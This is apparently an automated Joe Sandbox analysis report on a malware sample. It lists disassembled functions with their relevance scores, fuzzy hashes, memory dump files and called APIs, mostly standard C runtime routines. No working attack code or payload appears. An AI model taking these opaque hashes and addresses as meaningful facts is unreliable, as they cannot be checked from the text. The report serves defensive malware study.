Opcode Fuzzy Hash: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
Instruction Fuzzy Hash: 9721BE215B0AE305CB855FF9FCC011267D1CBCD21F75EC279CE54C9166D06DE66386A4

Function 00C7008E Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41db3c63be5edd695d2948622c74c2bef9fd5632c0b5baf3cbfe3cc183ca57f6
Instruction ID: ace3724773eee69e0f38985281b8ef0b057c2a7f6e519a31f372859c379cd830
Opcode Fuzzy Hash: 41db3c63be5edd695d2948622c74c2bef9fd5632c0b5baf3cbfe3cc183ca57f6
Instruction Fuzzy Hash: C82180B5D0020A8FCB04CFA9C4816EEFBF4BB48320F50846EC956B3350E634AA45CF94

Function 00C7039D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: 702d98bad268bd8ad56f97a6e447ded73d99e17e8405f151f3f8cfb5a1ffaa74
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: D0F01236904114EBCF11CF55D805AAEF7B9EB47760F257155E509B3610C730EE11DB98

Function 00C5CB61 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f2cdd2641625d604f62dc6cd32ec5eef69bc2089c6a2b2a3dd962b1c395271
Instruction ID: a2670f3f0328f1de90723e6ffd3bc8d3f5ed5a8ed8f9b1b779504208b36ffbfe
Opcode Fuzzy Hash: 31f2cdd2641625d604f62dc6cd32ec5eef69bc2089c6a2b2a3dd962b1c395271
Instruction Fuzzy Hash: 07E08C72911328EBCB14DBA8D98598AF3ECEB44B51B11459AB911D3200C270DE84DBD8

Function 00C87616 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 00C52A2B Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ce394b574a09d1dae7fa6a0133b4a460712ac2a4347c9e6b5193589fd4fa525
Instruction ID: af3ca45b731b2c9143e69608c183296f395583191e57abe0fbd96d7ea1acc7c3
Opcode Fuzzy Hash: 0ce394b574a09d1dae7fa6a0133b4a460712ac2a4347c9e6b5193589fd4fa525
Instruction Fuzzy Hash: 67C08C3C000A004FCE398910C2B23B43394E392B83F80088CCC120B653C52EDDCBF648

Function 00C7037A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 00C70392 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 00C915D6 Relevance: 54.3, APIs: 36, Instructions: 344
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

operator+.LIBCMT ref: 00C915F1

Part of subcall function 00C8E700: DName::DName.LIBCMT ref: 00C8E713
Part of subcall function 00C8E700: DName::operator+.LIBCMT ref: 00C8E71A

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: 35539629968e138beffd51becdf4c8dee185b9484c6757ffb25b44c6f192daa8
Instruction ID: 036f4fb6b3e3668208e2ff99a14e643760622e11d5eed7a302ba1bd746715c00
Opcode Fuzzy Hash: 35539629968e138beffd51becdf4c8dee185b9484c6757ffb25b44c6f192daa8
Instruction Fuzzy Hash: 56D12E71D0020AAFDF10EFA8C896AEEBBF8EF04304F144069F915E7292DB709A45DB55

Function 00C9231E Relevance: 27.3, APIs: 18, Instructions: 274
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnDecorator::getECSUDataType.LIBCMT ref: 00C924BD
DName::operator=.LIBCMT ref: 00C9256B
DName::operator+=.LIBCMT ref: 00C92596
DName::DName.LIBCMT ref: 00C925FB
DName::operator+.LIBCMT ref: 00C92602
DName::DName.LIBCMT ref: 00C92625
DName::operator+.LIBCMT ref: 00C9262C
DName::operator+=.LIBCMT ref: 00C92638
DName::operator=.LIBCMT ref: 00C9265F
DName::operator+=.LIBCMT ref: 00C92671
UnDecorator::getPtrRefType.LIBCMT ref: 00C9269A
operator+.LIBCMT ref: 00C926AC

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Decorator::getNameName::Name::operator+Name::operator=Type$Dataoperator+
String ID:
API String ID: 1129569759-0
Opcode ID: 4b1be98ed866d8c366e32d253dce9319d2bb76e25a18985d730366eca7cfee2b
Instruction ID: daf1db8ea7153ed0f7890464983c1c9ec0ecd9f31daaa559ba79f5f5a8b616e8
Opcode Fuzzy Hash: 4b1be98ed866d8c366e32d253dce9319d2bb76e25a18985d730366eca7cfee2b
Instruction Fuzzy Hash: 0991CF71900209BFCF28EF98C89DABD7B74AF14312F248166F8A1E7292C7349B44DB55

Function 00C97B94 Relevance: 24.1, APIs: 16, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__calloc_crt.LIBCMT ref: 00C97BAD
__calloc_crt.LIBCMT ref: 00C97BD1
_free.LIBCMT ref: 00C97BDF
__calloc_crt.LIBCMT ref: 00C97BED
_free.LIBCMT ref: 00C97BFD
_free.LIBCMT ref: 00C97C03
__copytlocinfo_nolock.LIBCMT ref: 00C97C12
__setlocale_nolock.LIBCMT ref: 00C97C1F
___removelocaleref.LIBCMT ref: 00C97C2B
___freetlocinfo.LIBCMT ref: 00C97C32
_free.LIBCMT ref: 00C97C38
__setmbcp_nolock.LIBCMT ref: 00C97C4A
_free.LIBCMT ref: 00C97C58
___removelocaleref.LIBCMT ref: 00C97C5F
___freetlocinfo.LIBCMT ref: 00C97C66
_free.LIBCMT ref: 00C97C6C

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 2193103758-0
Opcode ID: e0e6feb646b9d5f5c9fbc8e349c52ac7b28d7dbcf52fdc2cb7b6a8317b8b62f5
Instruction ID: fb6bcfdf612b9d0bcd4f93839b69ecbe90d934474cfd5e92684a269df310a01e
Opcode Fuzzy Hash: e0e6feb646b9d5f5c9fbc8e349c52ac7b28d7dbcf52fdc2cb7b6a8317b8b62f5
Instruction Fuzzy Hash: 4F21083511D610FBDF227F2ADC0ED1A77E5DF91B10B20851AF89856291EF319D10E7A4

Function 00C926E1 Relevance: 13.6, APIs: 9, Instructions: 138
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator=.LIBCMT ref: 00C92730
DName::operator+=.LIBCMT ref: 00C9273E
UnDecorator::getPtrRefType.LIBCMT ref: 00C9276A
UnDecorator::getDataIndirectType.LIBCMT ref: 00C927E7
operator+.LIBCMT ref: 00C92883

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Decorator::getType$DataIndirectName::operator+=Name::operator=operator+
String ID:
API String ID: 1973130989-0
Opcode ID: db8d11a71f2a75281423040ef37102b4fb204d993fb2863e53b6f8aff2559828
Instruction ID: 6dafdb13bde247b84ab86b448356acf8d15a1a1f830622bf7ac0f7f9c2a481e7
Opcode Fuzzy Hash: db8d11a71f2a75281423040ef37102b4fb204d993fb2863e53b6f8aff2559828
Instruction Fuzzy Hash: DA41B372900209BFCF24AF94DC899B97B78FF04342F5440A6F895A71A2D730DB41DB99

Function 00C5A1CD Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00C5A446

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 62fa3268e71d0530ae9e7b548eaf658603a4674e21041ebfe6750fe24f85e7d7
Instruction ID: 0884f646a0eb7006537593aac9d5c25b4a67fb6944ac7133ebf621c655d318cb
Opcode Fuzzy Hash: 62fa3268e71d0530ae9e7b548eaf658603a4674e21041ebfe6750fe24f85e7d7
Instruction Fuzzy Hash: 6AB14678E04205AFDB11CFDAD884BBD7BB1BF45301F144259ED109B292C7B19E89CB66

Function 00C8E9C2 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnDecorator::getArgumentList.LIBCMT ref: 00C8E9E7

Part of subcall function 00C8E582: Replicator::operator[].LIBCMT ref: 00C8E605
Part of subcall function 00C8E582: DName::operator+=.LIBCMT ref: 00C8E60D

DName::operator+.LIBCMT ref: 00C8EA40
DName::DName.LIBCMT ref: 00C8EA98

Strings

D;C, xrefs: 00C8EA2C
(;C, xrefs: 00C8EA82
8;C, xrefs: 00C8EA33
4;C, xrefs: 00C8EA7B

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: (;C$4;C$8;C$D;C
API String ID: 834187326-2621726175
Opcode ID: 00b4ba88f2529d6448c9a8a500a00b8311539c59f106ea20ca9a2e191a690bfb
Instruction ID: 583f0c5e0db4960860b320aa99ed51e5f46ce7f6f738b649486ce6481bd73732
Opcode Fuzzy Hash: 00b4ba88f2529d6448c9a8a500a00b8311539c59f106ea20ca9a2e191a690bfb
Instruction Fuzzy Hash: 49217C306002049FCB29EF5CD8449A97FB4FF45B8EB4480A5F855DB266CB34EA42EB49

Function 00C4BC58 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 00C4BD77
___TypeMatch.LIBVCRUNTIME ref: 00C4BE85
CallUnexpected.LIBVCRUNTIME ref: 00C4BFF2

Strings

csm, xrefs: 00C4BC95
csm, xrefs: 00C4BDAE
csm, xrefs: 00C4BD02

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: 1346b9d78dba9a45d0b7bc74e3deeca7ab2702b80a078bbaf169f9e2fdaca626
Instruction ID: 71219d2704198bebf2b54eaa7ba23673a0b5c4bc06552327d519edd720db0a00
Opcode Fuzzy Hash: 1346b9d78dba9a45d0b7bc74e3deeca7ab2702b80a078bbaf169f9e2fdaca626
Instruction Fuzzy Hash: 87B17875C00209AFDF25DFA4C8819AEBBB9FF14310F14449AE8296B216D731EE51DF91

Function 00C57A1B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,27568A11,?,00C57B28,00C4DAD6,?,F8250000,00000000), ref: 00C57ADC

Strings

ext-ms-, xrefs: 00C57A86
api-ms-, xrefs: 00C57A72

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 0d1c9a94939f5b5d1ae3c4dba86bdfc24d4508aff18f53490960cc81dc28bec3
Instruction ID: 6ed9cdbb4dd95a81d16086ded9ff4ce5832cf0742e6a2a2c40e15e10acb3ecfc
Opcode Fuzzy Hash: 0d1c9a94939f5b5d1ae3c4dba86bdfc24d4508aff18f53490960cc81dc28bec3
Instruction Fuzzy Hash: 47212635609211BBCB319B62FC40B5E3768DB41761F251310ED15A7280E770EFC4E6D4

Function 00C9035B Relevance: 10.6, APIs: 7, Instructions: 55
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnDecorator::UScore.LIBCMT ref: 00C90365
DName::DName.LIBCMT ref: 00C90371

Part of subcall function 00C8E03C: DName::doPchar.LIBCMT ref: 00C8E06D

UnDecorator::getScopedName.LIBCMT ref: 00C903B0
DName::operator+=.LIBCMT ref: 00C903BA
DName::operator+=.LIBCMT ref: 00C903C9
DName::operator+=.LIBCMT ref: 00C903D5
DName::operator+=.LIBCMT ref: 00C903E2

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID:
API String ID: 1480779885-0
Opcode ID: 7491704a406c1c578bfc7b1f4575f9842b7a48a94faccf0b99b655ecd725c168
Instruction ID: 8b38d267773005f20e5fff541ac1c4d01dfb85d511b4a74f8d8ff27e6059b85e
Opcode Fuzzy Hash: 7491704a406c1c578bfc7b1f4575f9842b7a48a94faccf0b99b655ecd725c168
Instruction Fuzzy Hash: 4A11E571900208AFCB04FB68C85ABAD7BB4BF10305F144095E413AB2E2DBB0DB41D755

Function 00C452F2 Relevance: 10.5, APIs: 7, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00C452F9
std::_Lockit::_Lockit.LIBCPMT ref: 00C45303
int.LIBCPMT ref: 00C4531A

Part of subcall function 00C416FA: std::_Lockit::_Lockit.LIBCPMT ref: 00C4170B
Part of subcall function 00C416FA: std::_Lockit::~_Lockit.LIBCPMT ref: 00C41725

codecvt.LIBCPMT ref: 00C4533D
std::_Facet_Register.LIBCPMT ref: 00C45354
std::_Lockit::~_Lockit.LIBCPMT ref: 00C45374
Concurrency::cancel_current_task.LIBCPMT ref: 00C45381

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: a8a24a4fbd381659de37e717250db654be4ed2444497cfb6211b0140c6bb7f96
